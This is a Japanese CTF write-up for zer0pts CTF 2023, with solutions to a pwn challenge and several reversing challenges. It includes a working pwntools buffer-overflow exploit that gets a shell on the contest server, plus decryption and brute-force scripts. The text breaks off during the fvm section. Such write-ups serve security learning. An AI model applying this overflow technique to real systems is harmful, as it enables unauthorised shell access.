zer0pts CTF 2023に参加しました。そのwrite-up記事です。問題や公式write-up等は zer0pts CTF 2023 Official Writeups - HackMD にまとめられています。
- コンテスト概要
- 結果
- 環境
- 解けた問題
- 感想
2023/07/15(土) 12:00 +09:00 - 2023/07/16(日) 12:00 +09:00 の開催期間でした。他ルールはトップページ記載内容から引用します:
[ About ] Welcome to zer0pts CTF 2023! zer0pts CTF is a jeopardy-style CTF. We offer a diverse range of enjoyable challenges across various difficulty levels and categories, all without the need for any guessing skills. [ Contact ] Discord: https://discord.gg/3QrDP2sMYd [ Prizes ] There are prizes for the top-performing teams. 🥇 1000 USD + 1 year HTB voucher (VIP+) × 4 🥈 500 USD + 1 year HTB voucher (VIP) × 4 🥉 250 USD + 6 months HTB voucher (VIP) × 4 The team that secures the first place will qualify for the SECCON CTF 2023 Finals (International division). The top 3 teams must submit writeups of some challenges to zer0ptsctf@gmail.com within 24h after the CTF ends. We will specify which challenges need writeups after the CTF. [ Rules ] There is no limit on your team size. Anyone can participate in this CTF: there are no restrictions based on age or nationality. Your rank on the scoreboard depends on two factors: 1) your total number of points (higher is better); 2) the timestamp of your last solved challenge (erlier is better). The survey challenge is special: it awards you some points, but it doesn't update your "last solved challenge" timestamp. You can't get ahead simply by solving the survey faster. Brute-forcing the flags is not allowed. If you submit 5 incorrect flags in quick succession, the flag submission form will be locked for 5 minutes. Each person can participate in only one team. Sharing solutions, hints, or flags with other teams during the competition is strictly forbidden. You are not allowed to attack the scoreserver. You are not allowed to attack other teams. Having multiple accounts is not allowed. If you are unable to log in to your account, please contact us on Discord. We reserve the right to ban and disqualify any teams breaking any of these rules. The flag format is zer0pts\{[\x20-\x7e]+\}, unless specified otherwise. Most importantly: good luck and have fun! (後略)
WindowsのWSL2(Ubuntu 22.04)を使って取り組みました。
c:\>ver Microsoft Windows [Version 10.0.19045.3208] c:\>wsl -l -v NAME STATE VERSION * Ubuntu-22.04 Running 2 kali-linux Stopped 2 docker-desktop Running 2 docker-desktop-data Running 2 c:\>
- IDA Version 8.3.230608 Windows x64 (64-bit address size) (なお、Free版IDA version 8.2からはx86バイナリもクラウドベースの逆コンパイルができます。version 7頃から引き続き、x64バイナリも同様に逆コンパイルができます。)
- Microsoft Visual Studio Community 2022 (64-bit) - Current Version 17.6.2
- x64dbg Version May 25 2023, 00:25:30
WSL2(Ubuntu 22.04)
$ cat /proc/version Linux version (oe-user@oe-host) (x86_64-msft-linux-gcc (GCC) 9.3.0, GNU ld (GNU Binutils) #1 SMP Fri Jan 27 02:56:13 UTC 2023 $ cat /etc/os-release PRETTY_NAME="Ubuntu 22.04.2 LTS" NAME="Ubuntu" VERSION_ID="22.04" VERSION="22.04.2 LTS (Jammy Jellyfish)" VERSION_CODENAME=jammy ID=ubuntu ID_LIKE=debian HOME_URL="https://www.ubuntu.com/" SUPPORT_URL="https://help.ubuntu.com/" BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/" PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy" UBUNTU_CODENAME=jammy $ python3 --version Python 3.10.6 $ python3 -m pip show pip | grep Version Version: 22.0.2 $ python3 -m pip show pwntools | grep Version Version: 4.10.0 $ python3 -m pip show tqdm | grep Version Version: 4.64.0 $ gdb --version GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1 Copyright (C) 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. $ cat ~/peda/README | grep -e 'Version: ' -e 'Release: ' Version: 1.0 Release: special public release, Black Hat USA 2012 $ strace --version strace -- version 5.16 Copyright (c) 1991-2022 The strace developers <https://strace.io>. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Optional features enabled: stack-trace=libunwind stack-demangle m32-mpers mx32-mpers $
[welcome] welcome (464 team solved, 53 points)
Check Discord for the flag. We will also announce some important information there.
ptr — Today at 11:59 AM @everyone 📣 The CTF has just started! Here is the welcome flag 📣 zer0pts{3nj0y_th3_CTF_t0_W1N2023!!!!}
フラグを入手できました: zer0pts{3nj0y_th3_CTF_t0_W1N2023!!!!}
[pwn, warmup] aush (101 team solved, 96 points)
I will give you the shell, but after you authenticated yourself. nc pwn.2023.zer0pts.com 9006
$ file * Dockerfile: ASCII text aush: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2a5305931cbcc0922d0271cf6457ea091ad67e75, for GNU/Linux 3.2.0, not stripped docker-compose.yml: ASCII text main.c: C source, ASCII text $ pwn checksec aush [*] '/mnt/d/Documents/work/ctf/zer0pts_CTF_2023/aush/aush' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled $
#include <fcntl.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #define LEN_USER 0x10 #define LEN_PASS 0x20 int setup(char *passbuf, size_t passlen, char *userbuf, size_t userlen) { int ret, fd; // TODO: change it to password/username file if ((fd = open("/dev/urandom", O_RDONLY)) == -1) return 1; ret = read(fd, passbuf, passlen) != passlen; ret |= read(fd, userbuf, userlen) != userlen; close(fd); return ret; } int main(int argc, char **argv, char **envp) { char *args[3]; char inpuser[LEN_USER+1] = { 0 }; char inppass[LEN_PASS+1] = { 0 }; char username[LEN_USER] = { 0 }; char password[LEN_PASS] = { 0 }; if (system("/usr/games/cowsay Welcome to AUSH: AUthenticated SHell!") != 0) { write(STDOUT_FILENO, "cowsay not found\n", 17); return 1; } /* Load password and username file */ if (setup(password, LEN_PASS, username, LEN_USER)) return 1; /* Check username */ write(STDOUT_FILENO, "Username: ", 10); if (read(STDIN_FILENO, inpuser, 0x200) <= 0) return 1; if (memcmp(username, inpuser, LEN_USER) != 0) { args[0] = "/usr/games/cowsay"; args[1] = "Invalid username"; args[2] = NULL; execve(args[0], args, envp); } /* Check password */ write(STDOUT_FILENO, "Password: ", 10); if (read(STDIN_FILENO, inppass, 0x200) <= 0) return 1; if (memcmp(password, inppass, LEN_PASS) != 0) { args[0] = "/usr/games/cowsay"; args[1] = "Invalid password"; args[2] = NULL; execve(args[0], args, envp); } /* Grant access */ args[0] = "/bin/sh"; args[1] = NULL; execve(args[0], args, envp); return 0; }
, password
型ですがNUL文字終端はされません)。一方で、ユーザー入力を受けるread(STDIN_FILENO, inpuser, 0x200)
およびread(STDIN_FILENO, inppass, 0x200)
でBuffer Overflowが発生することも分かります。
, password
(前略) -0000000000000080 username db 16 dup(?) -0000000000000070 inpuser db 32 dup(?) -0000000000000050 password db 32 dup(?) -0000000000000030 inppass db 40 dup(?) -0000000000000008 qwCanary dq ? +0000000000000000 s db 8 dup(?) +0000000000000008 r db 8 dup(?) +0000000000000010 +0000000000000010 ; end of stack variables
変数が最も若いアドレスにあります!そういうわけで、どうあがいてもInvalid username
, inpuser
$ ./aush _______________________________________ < Welcome to AUSH: AUthenticated SHell! > --------------------------------------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || Username: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Password:
$ strace ./aush execve("./aush", ["./aush"], 0x7ffde6cc55e0 /* 24 vars */) = 0 (中略) write(1, "Username: ", 10Username: ) = 10 read(0, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"..., 512) = 512 execve("/usr/games/cowsay", ["/usr/games/cowsay", "Invalid username"], 0x7fffa7548658 /* 24 vars */) = -1 EFAULT (Bad address) write(1, "Password: ", 10Password: ) = 10
#!/usr/bin/env python3 import pwn BIN_NAME = "./aush" pwn.context.binary = BIN_NAME # pwn.context.log_level = "DEBUG" def solve(io): # -0000000000000080 username db 16 dup(?) # -0000000000000070 inpuser db 32 dup(?) # -0000000000000050 password db 32 dup(?) # -0000000000000030 inppass db 32 dup(?) io.sendafter(b"Username: ", b"A" * (512)) io.sendafter(b"Password: ", b"A" * 32 + b"\x00"*(512-32)) io.interactive() # with pwn.process(BIN_NAME) as io: solve(io) with pwn.remote("pwn.2023.zer0pts.com", 9006) as io: solve(io) command = """ set follow-fork-mode parent b *(main+0x122) c """ # with pwn.gdb.debug([BIN_NAME], command) as io: solve(io)
$ ./solve.py [*] '/mnt/d/Documents/work/ctf/zer0pts_CTF_2023/aush/aush' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [+] Opening connection to pwn.2023.zer0pts.com on port 9006: Done [*] Switching to interactive mode $ ls bin boot dev etc flag-fa42a46ca5184f00fe7138bd3736767c.txt home lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var $ cat flag* zer0pts{p0lLut3_7h3_3nv1r0nnnNNnnnNnnnnNNNnnNnnNn} $ [*] Closed connection to pwn.2023.zer0pts.com port 9006 $
フラグを入手できました: zer0pts{p0lLut3_7h3_3nv1r0nnnNNnnnNnnnnNNNnnNnnNn}
[reversing, warmup] decompile me (124 team solved, 91 points)
Reverse engineering is getting easier thanks to IDA/Ghidra decompiler!
$ file chall chall: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2ab445e9f70698730020147cd5891e52c3ad234c, for GNU/Linux 3.2.0, not stripped $
int __fastcall main(int argc, const char **argv, const char **envp) { _QWORD v4[65]; // [rsp+0h] [rbp-208h] BYREF memset(v4, 0, 0x200uLL); v4[0] = 128LL; write(1LL, "FLAG: ", 14LL); read(0LL, v4, 128LL); RC4_setkey(&key, &sbox); RC4_encrypt(v4, &v4[16], &sbox); if ( !memcmp(&v4[16], &enc, 128LL) ) return puts("Correct!"); else return puts("Wrong..."); }
関数の場合では、関数引数の受け取り方がx64 ELFの一般的な呼び出し規約の「rdi
, rsi
, rdx
, rcx
, r8
, r9
, 残りはスタック」ではなく、r13
, r14
, r15
という呼び出し規約を指定すると、引数や戻り値に任意のレジスタを指定できます(構文が独特なので、慣れるまではBad declaration
エラーをもらいがちです)。詳細はIgor’s tip of the week #51: Custom calling conventions – Hex Raysを参照ください。今回の問題バイナリの関数に、適切な呼び出し規約を適用したり、変数名を調整したりした結果を以下に示します:
int __fastcall main(int argc, const char **argv, const char **envp) { BYTE byteArrayInputSize128[128]; // [rsp+0h] [rbp-208h] BYREF BYTE byteArrayEncryptedResultSize128[128]; // [rsp+80h] [rbp-188h] BYREF BYTE sbox[264]; // [rsp+100h] [rbp-108h] BYREF memset(byteArrayInputSize128, 0, 0x200uLL); *(_QWORD *)byteArrayInputSize128 = 128LL; write(1LL, "FLAG: ", 14LL); read(0LL, byteArrayInputSize128, 128LL); RC4_setkey(sbox, &val); // valはグローバル変数 RC4_encrypt(sbox, byteArrayEncryptedResultSize128, byteArrayInputSize128); if ( !memcmp(byteArrayEncryptedResultSize128, 0x80u) ) return puts("Correct!"); else return puts("Wrong..."); } void __usercall RC4_setkey(BYTE *pSbox@<r13>, const BYTE *pKeySize8@<r12>) { __int64 dwIndex; // rcx __int64 j; // rdx __int64 i; // rcx __int64 dwKeyIndex; // rbx BYTE byteValue2; // di dwIndex = 0LL; LOBYTE(j) = 0; do { pSbox[dwIndex] = dwIndex; dwIndex = (unsigned int)(dwIndex + 1); } while ( (unsigned int)dwIndex < 0x100 ); i = 0LL; dwKeyIndex = 0LL; do { j = (unsigned __int8)(pKeySize8[dwKeyIndex] + pSbox[i] + j); byteValue2 = pSbox[j]; pSbox[j] = pSbox[i]; pSbox[i] = byteValue2; dwKeyIndex = (unsigned int)(dwKeyIndex + 1); if ( (unsigned int)dwKeyIndex >= 8 ) dwKeyIndex = 0LL; i = (unsigned int)(i + 1); } while ( (unsigned int)i < 0x100 ); } void __usercall RC4_encrypt(BYTE *pSbox@<r13>, BYTE *pByteArrayDest@<r14>, const BYTE *pByteXorArray@<r15>) { __int64 dwDestIndex; // rcx __int64 dwIndex1; // rdx __int64 dwIndex2; // rbx BYTE byteValue1; // di dwDestIndex = 0LL; LOBYTE(dwIndex1) = 0; LOBYTE(dwIndex2) = 0; do { dwIndex1 = (unsigned __int8)(dwIndex1 + 1); dwIndex2 = (unsigned __int8)(pSbox[dwIndex1] + dwIndex2); byteValue1 = pSbox[dwIndex1]; pSbox[dwIndex1] = pSbox[dwIndex2]; pSbox[dwIndex2] = byteValue1; pByteArrayDest[dwDestIndex] = pByteXorArray[dwDestIndex] ^ pSbox[(unsigned __int8)(pSbox[dwIndex2] + pSbox[dwIndex1])]; dwDestIndex = (unsigned int)(dwDestIndex + 1); } while ( (unsigned int)dwDestIndex < 0x80 ); } // 実際はmemcmpでもなんでもなくてdatと一致するかを検証している __int64 __usercall memcmp@<rax>(const BYTE *pData@<r14>, unsigned int dwLength@<edx>) { __int64 bIsNotEquals; // rax __int64 dwIndex; // rcx bIsNotEquals = 0LL; dwIndex = 0LL; do { LOBYTE(bIsNotEquals) = dat[dwIndex] ^ pData[dwIndex] | bIsNotEquals;// datはグローバル変数 dwIndex = (unsigned int)(dwIndex + 1); } while ( (unsigned int)dwIndex < dwLength ); return bIsNotEquals; }
なお、最近知ったことなのですが、IDAのIDA View
やHex View
を押すとExport data
というキー操作や、Export data
ダイアログについては右クリックメニューに現れません。見えないものを知ることはとても難しいです)。詳細はIgor’s tip of the week #39: Export Data – Hex Raysを参照ください。例として、今回の問題のdat
#!/usr/bin/env python3 def RC4_setkey(sbox, val): for i in range(256): sbox[i] = i valueIndex = 0 j = 0 for i in range(256): j = (val[valueIndex] + sbox[i] + j) % 256 (sbox[i], sbox[j]) = (sbox[j], sbox[i]) valueIndex = (valueIndex + 1) % 8 def RC4_encrypt(sbox, key): result = bytearray(128) i = 0 j = 0 for destIndex in range(128): i += 1 j = (sbox[i] + j) % 256 (sbox[i], sbox[j]) = (sbox[j], sbox[i]) result[destIndex] = key[destIndex] ^ sbox[(sbox[i] + sbox[j]) % 256] return result val = bytes.fromhex("3109811919144511") dat = bytes.fromhex("78CFC485DC33074C9335FB7C108EBE9328E62E75DA5E85C591157589480E29A4F9A63A6E1F84F742B09331F068C0433807320957DA3244CFCD8FE5BFE3D6BB599A6A8485D322A98EB5EABD57DEB16C93E47470AC1A03D9169FBC97FB85D9A69ED4D60259D528B39316B6C478C4A212D2EFB15418FD7651A35E57B8584B1EE241") sbox = bytearray(256) RC4_setkey(sbox, val) decrypted = RC4_encrypt(sbox, dat) print(decrypted.rstrip(b"\x00").decode())
$ ./solve.py zer0pts{d0n'7_4lw4y5_7ru57_d3c0mp1l3r} $
フラグを入手できました: zer0pts{d0n'7_4lw4y5_7ru57_d3c0mp1l3r}
[reversing] mimikyu (64 team solved, 121 points)
Deja vu in Windows
$ file * libc.so.6: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=69389d485a9793dbe873f0ea2c93e02efaa9aa3d, for GNU/Linux 3.2.0, stripped libgmp.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=f110719303ddbea25a5e89ff730fec520eed67b0, stripped mimikyu: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=62ad96fb0de6f5a09fa97599f9bf9143a6280216, for GNU/Linux 3.2.0, not stripped $
関数にブレークポイントを設置して、解決する関数名を確認- 必要な場合には、
int __fastcall main(int argc, const char **argv, const char **envp) { __int64 dwRandomValue; // rdx __int64 dwRandomValue2; // rdx unsigned __int64 i; // [rsp+18h] [rbp-78h] unsigned __int64 j; // [rsp+20h] [rbp-70h] unsigned __int64 k; // [rsp+28h] [rbp-68h] char *pStrInputted; // [rsp+30h] [rbp-60h] void *hLibc; // [rsp+40h] [rbp-50h] void *hGMP; // [rsp+48h] [rbp-48h] char mpz1[16]; // [rsp+50h] [rbp-40h] BYREF char mpz2[16]; // [rsp+60h] [rbp-30h] BYREF char mpz3[24]; // [rsp+70h] [rbp-20h] BYREF unsigned __int64 qwCanary; // [rsp+88h] [rbp-8h] qwCanary = __readfsqword(0x28u); if ( argc > 1 ) { pStrInputted = (char *)argv[1]; if ( strlen(pStrInputted) == 40 ) { hLibc = LoadLibraryA("libc.so.6"); if ( !hLibc ) __assert_fail("hLibc != NULL", "main.c", 0x4Au, "main"); hGMP = LoadLibraryA("libgmp.so"); if ( !hGMP ) __assert_fail("hGMP != NULL", "main.c", 0x4Cu, "main"); ResolveModuleFunction(hGMP, 1907704461, mpz1);// "__gmpz_init" ResolveModuleFunction(hGMP, 1907704461, mpz2);// "__gmpz_init" ResolveModuleFunction(hGMP, 1907704461, mpz3);// "__gmpz_init" ResolveModuleFunction(hLibc, 4236145432, *(unsigned int *)main);// srand(0xfa1e0ff3)。mainを間接参照しています、PIEだろうが先頭4バイト固定です!(endbr64命令そのもの) ResolveModuleFunction(hLibc, 2484709472, _bss_start, 0LL);// setbuf(何か, 0);多分stdoutのバッファリング無効 printf("Checking..."); for ( i = 0LL; i < 40; ++i ) { if ( !(unsigned int)ResolveModuleFunction(hLibc, 0x4E8A031A, (unsigned int)pStrInputted[i]) )// isprint { labelPutWrong: puts("\nWrong."); goto labelCleanUp; } } for ( j = 0LL; j < 40; j += 4LL ) { ResolveModuleFunction(hGMP, -249367710, mpz2, 1LL);// __gmpz_set_ui(1)、なお「#define mpz_set_ui __gmpz_set_ui」、 value = 1; for ( k = 0LL; k <= 2; ++k ) { ResolveModuleFunction(hLibc, 13994153, '.');// putchar dwRandomValue = (int)ResolveModuleFunction(hLibc, 2070735453) % 0x10000;// rand() cap(hLibc, hGMP, dwRandomValue, (__int64)mpz1);// mpz1 = (乱数依存の値) ResolveModuleFunction(hGMP, 880641627, mpz2, mpz2, mpz1);// __gmpz_mul(); mpz2 *= mpz1 } ResolveModuleFunction(hLibc, 13994153, '.');// putchar、結局ここまででmpz2 = (乱数依存の値3個の積);になっている dwRandomValue2 = (int)ResolveModuleFunction(hLibc, 2070735453) % 0x10000;// rand() cap(hLibc, hGMP, dwRandomValue2, (__int64)mpz3);// mpz3 = (乱数依存の値) ResolveModuleFunction(hGMP, -249367710, mpz1, *(unsigned int *)&pStrInputted[j]);// __gmpz_set_ui(); mpz1 = (フラグのN文字目から4文字分の値) ResolveModuleFunction(hGMP, -1876728194, mpz1, mpz1, mpz3, mpz2);// __gmpz_powm(); mpz1 = (mpz1 ** mpz3) % mpz2; if ( (unsigned int)ResolveModuleFunction(hGMP, -1309138724, mpz1, encoded[j >> 2]) )// __gmpz_cmp_ui goto labelPutWrong; } puts("\nCorrect!"); labelCleanUp: ResolveModuleFunction(hGMP, 835473311, mpz1);// __gmpz_clear() ResolveModuleFunction(hGMP, 835473311, mpz2);// __gmpz_clear() ResolveModuleFunction(hGMP, 835473311, mpz3);// __gmpz_clear() CloseHandle(hLibc); CloseHandle(hGMP); return 0; } else { puts("Nowhere near close."); return 0; } } else { printf("Usage: %s FLAG\n", *argv); return 1; } } // 乱数依存のなにかの整数を格納しそう void __fastcall cap(void *hLibc, void *hGMP, __int64 dwRandomValue, __int64 mpzWork) { char strFormat[4]; // [rsp+3Ch] [rbp-24h] BYREF char strFormatted[24]; // [rsp+40h] [rbp-20h] BYREF unsigned __int64 qwCanary; // [rsp+58h] [rbp-8h] qwCanary = __readfsqword(0x28u); *(_DWORD *)strFormat = 0x2A4E700F; ResolveModuleFunction(hGMP, -249367710, mpzWork, 0LL);// __gmpz_set_ui(どっかへのアドレス, 0); work = 0; ResolveModuleFunction(hLibc, -413265922, dwRandomValue);// hcreate(0x657f等の乱数); よくわからないけどhsearchで検索する用途? ResolveModuleFunction(hLibc, 474403722, strFormat, 4LL);// memfrob(&v, 4), 各バイトを42(=0x2a)でXORを取るやつ do { ResolveModuleFunction(hGMP, 1955180440, strFormatted, strFormat, mpzWork);// __gmp_sprintf(文字列, "%Zd", 1, dest?), 多分ドキュメント上の名前はgmp_sprintf ResolveModuleFunction(hGMP, -314869232, mpzWork, mpzWork, 1LL);// __gmpz_add_ui(work, work, 1); work += 1 } while ( ResolveModuleFunction(hLibc, 1353400471, strFormatted, 0LL, 1LL) );// hsearch(str, 0, 1) ResolveModuleFunction(hLibc, -1353971267); // hdestroy() ResolveModuleFunction(hGMP, 473889088, mpzWork, mpzWork, 1LL);// __gmpz_sub_ui(何か, 何か, 1); work -= 1 }
等のアンダーバーから始まる関数ですが、ヘッダーファイルgmp-wasm/gmp-h.in at main · torquem-ch/gmp-wasmにおいて#define mpz_set_ui __gmpz_set_ui
等と別名が付けられています。Top (GNU MP 6.2.1)のドキュメント上では、mpz_set_ui
- コマンドライン引数の長さが40文字であることを検証します。
関数の命令先頭4バイトの使用している点に注意してください。- コマンドライン引数40文字すべてが
であること(=印字可能文字であること)を検証します。 - フラグ先頭から4文字ごとについて、以下の内容を検証します。検証失敗時はその時点で
結果も固定される点に注意してください。- 1の処理を3回行い、それらの総乗を計算します。
- 改めて1の処理を行います。
(現在処理中のフラグ中4文字) ** (3の結果) % (2の結果)
$ gdb -nx -q ./mimikyu.patched Reading symbols from ./mimikyu.patched... (No debugging symbols found in ./mimikyu.patched) (gdb) break *(cap+0x10F) Breakpoint 1 at 0x18ad (gdb) commands Type commands for breakpoint(s) 1, one per line. End with a line saying just "end". >silent ># 試行錯誤した結果、↓の場所にsprintf結果がありました >x/s $rbp-0x20 >continue >end (gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Starting program: /mnt/d/Documents/work/ctf/zer0pts_CTF_2023/mimikyu/mimikyu.patched AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Checking....0x7fffffffe320: "25997" .0x7fffffffe320: "31567" .0x7fffffffe320: "47317" .0x7fffffffe320: "61651" .0x7fffffffe320: "23719" .0x7fffffffe320: "64553" .0x7fffffffe320: "36493" .0x7fffffffe320: "2143" .0x7fffffffe320: "4967" .0x7fffffffe320: "63977" .0x7fffffffe320: "12197" .0x7fffffffe320: "36451" .0x7fffffffe320: "49597" .0x7fffffffe320: "18481" .0x7fffffffe320: "20011" .0x7fffffffe320: "33353" .0x7fffffffe320: "53861" .0x7fffffffe320: "3671" .0x7fffffffe320: "54767" .0x7fffffffe320: "50849" .0x7fffffffe320: "64921" .0x7fffffffe320: "21277" .0x7fffffffe320: "23789" .0x7fffffffe320: "3181" .0x7fffffffe320: "47207" .0x7fffffffe320: "14797" .0x7fffffffe320: "25577" .0x7fffffffe320: "44789" .0x7fffffffe320: "28751" .0x7fffffffe320: "3779" .0x7fffffffe320: "11149" .0x7fffffffe320: "54751" .0x7fffffffe320: "35339" .0x7fffffffe320: "58477" .0x7fffffffe320: "50839" .0x7fffffffe320: "59021" .0x7fffffffe320: "57467" .0x7fffffffe320: "21799" .0x7fffffffe320: "61169" .0x7fffffffe320: "62459" Correct! [Inferior 1 (process 9937) exited normally] (gdb)
#!/usr/bin/env python3 import tqdm cap_results = [ 25997, 31567, 47317, 61651, 23719, 64553, 36493, 2143, 4967, 63977, 12197, 36451, 49597, 18481, 20011, 33353, 53861, 3671, 54767, 50849, 64921, 21277, 23789, 3181, 47207, 14797, 25577, 44789, 28751, 3779, 11149, 54751, 35339, 58477, 50839, 59021, 57467, 21799, 61169, 62459, ] # print(len(cap_results)) # __gmpz_cmp_uiが受けるデータ構造がよくわからないもののエスパー encoded = [ int.from_bytes(bytes.fromhex("F4 C5 25 C0 E4 0F 00 00"), "little"), int.from_bytes(bytes.fromhex("8A 7E F1 2F 79 1B 00 00"), "little"), int.from_bytes(bytes.fromhex("40 AB 56 B1 83 01 00 00"), "little"), int.from_bytes(bytes.fromhex("DA E5 F5 FC EF 0B 00 00"), "little"), int.from_bytes(bytes.fromhex("51 E2 86 CF 97 02 00 00"), "little"), int.from_bytes(bytes.fromhex("B4 D4 C1 ED B3 0E 00 00"), "little"), int.from_bytes(bytes.fromhex("08 3A CE 10 FA 00 00 00"), "little"), int.from_bytes(bytes.fromhex("72 86 41 DD 2B 00 00 00"), "little"), int.from_bytes(bytes.fromhex("46 EA 50 50 BB 5E 00 00"), "little"), int.from_bytes(bytes.fromhex("86 CF 73 9B BF 05 00 00"), "little"), ] # for x in encoded: # print(hex(x)) def generate_flag_4bytes(): r = range(0x20, 0x7F) for i in r: for j in r: for k in r: for l in r: value = (i<<24) | (j<<16) | (k << 8) | (l << 0) yield value for i in range(len(cap_results)//4): mod = 1 mod *= cap_results[i*4+0] mod *= cap_results[i*4+1] mod *= cap_results[i*4+2] exp = cap_results[i*4+3] for f in tqdm.tqdm(generate_flag_4bytes()): if pow(f, exp, mod) == encoded[i]: print(f.to_bytes(4, "little")) break
$ ./solve.py 14435111it [00:35, 414053.32it/s]b'zer0' 14464695it [00:35, 407419.25it/s] 78776944it [02:46, 469076.47it/s]b'pts{' 78778260it [02:46, 471772.67it/s] 64445716it [02:45, 376570.46it/s]b'L00k' 64449089it [02:45, 390476.90it/s] 16927484it [00:38, 452864.80it/s]b'_th3' 16947968it [00:38, 445276.31it/s] 72721143it [02:59, 392649.34it/s]b'_1nt' 72725128it [02:59, 404925.01it/s] 17835213it [00:35, 464871.85it/s]b'3rn4' 17859259it [00:35, 496568.47it/s] 60163646it [02:47, 348851.38it/s]b'l_0f' 60166711it [02:47, 359834.77it/s] 56721417it [02:39, 312304.45it/s]b'_l1b' 56747458it [02:39, 355525.84it/s] 15297524it [00:40, 389103.78it/s]b'r4r1' 15317407it [00:40, 377602.88it/s] 79750458it [04:00, 315638.45it/s]b'3s!}' 79752804it [04:00, 331722.33it/s] $
フラグ算出に20分弱かかりましたが、フラグを入手できました: zer0pts{L00k_th3_1nt3rn4l_0f_l1br4r13s!}
$ time ./mimikyu zer0pts{L00k_th3_1nt3rn4l_0f_l1br4r13s!} Checking........................................... Correct! ./mimikyu zer0pts{L00k_th3_1nt3rn4l_0f_l1br4r13s!} 120.38s user 0.01s system 99% cpu 2:00.40 total $
[reversing] fvm (28 team solved, 175 points)
Are you bored with x86? Enjoy this x87 VM.
$ file * fvm: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=1d42a28426669c67d05b93fef2bd37b8d660d1fd, for GNU/Linux 3.2.0, not stripped $
の初期化らしいなにか。- グローバル変数
へ書き込み。 finit
内容をエミュレート(=virtual machine、問題名のとおりです)。
fvm::emulate(void)+46 078 lea r13, [rsp+78h+qwSavedPosition]
$ ./fvm FLAG: test NG. $
- 「単純な逆アセンブラを書いて、頑張って脳内で読み解く?」→そもそも浮動小数点数演算命令に全く馴染みがないことや、浮動小数点数演算命令はSTレジスタというスタックを使うということがあり、即座に脳が理解を拒否。
- 「インラインアセンブラを多用してでもC言語ソースに起こして、gccあたりでコンパイルしてデバッガで追う?」→
命令等ではC言語の変数をインラインアセンブラと連携させる必要がありますが、gccのインラインアセンブラの記法が相変わらず全く理解できず挫折(詳細: Extended Asm (Using the GNU Compiler Collection (GCC)))。 - 「Visual C++向けのインラインアセンブラなら自然にC言語の変数と連携できるので、Visual C++向けCソースコードに起こす?」→Visual C++のインラインアセンブラはある程度慣れ親しんでいるので、その方針にしました!
ブロック中の1行に複数の命令を記述していると、inline assembler syntax error in 'opcode'; found 'constant'
, fldpi
, fmulp st(1), st
をデバッグ実行した場合と自作Cソース起こし版とで微妙に違う!」と壮大に悩んだりしていました(FPUのControl Wordの設定値が異なっていたためです)。
